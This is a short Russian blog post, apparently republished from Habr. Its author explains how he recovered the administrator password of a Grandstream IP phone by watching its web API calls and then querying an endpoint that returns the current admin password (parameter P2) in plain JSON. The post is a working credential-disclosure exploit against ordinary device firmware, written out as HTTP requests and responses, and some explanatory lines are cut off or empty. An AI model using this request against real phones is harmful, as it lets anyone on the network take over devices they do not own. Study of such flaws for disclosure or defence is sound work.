- PVSM.RU - https://www.pvsm.ru -
Сегодня столкнулся с проблемой: кто-то изменил пароль администратора к телефону. Почитав в сети информацию, сделал вывод, чтобы:
Как же найти выход из сложившейся ситуации? Да легко!
Для «узнавания» пароля мной был использован самый обычный браузер Google Chrome с установленным компонентов Furebug, плюс, другой телефон Grandstream GXP2124, доступ к которому у меня есть.
Дальше ход действий был следующий:
Запускаем браузер и включаем утилиту Firebug, после чего начинаем «гулять» по различным страницам. В списке запросов был обнаружен:
POST cgi-bin/api.values.get
а в теле ответа числится:
{«response»:«success», «body»:{«vendor_fullname»:«Grandstream Networks, Inc.»}}
Листая дальше, нашел и такой запрос:
POST cgi-bin/api-phone_operation
в запросе которого были переданы параметры:
cmd=extend&arg=&sid=639534b3e5a
Что же дальше? А дальше перехожу в настройки безопасности и изменяю пароль на телефоне, доступ к которому у меня уже есть и смотрю список ответов:
POST cgi-bin/api.values.post
Source:
P2=MyNewPass&:confirmAdminPwd=MyNewPass&sid=639534b3e5a
где:
Дальше, проявив фантазию, составляем запрос вида:
где 192.168.1.253 — IP-адрес телефона.
Отправляем и…
… и получаем JSON-ответ вида:
{«response»:«success», «body»:{«P2»: «adminPass»}}
где adminPass — текущий пароль администратора.
Profit!
С уважением, Andrey Helldar!
Автор: Helldar
Источник [2]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/ip-telefoniya/58849
Ссылки в тексте:
[1] 192.168.1.253/cgi-bin/api.values.get?request=P2: http://192.168.1.253/cgi-bin/api.values.get?request=P2
[2] Источник: http://habrahabr.ru/post/219225/
Нажмите здесь для печати.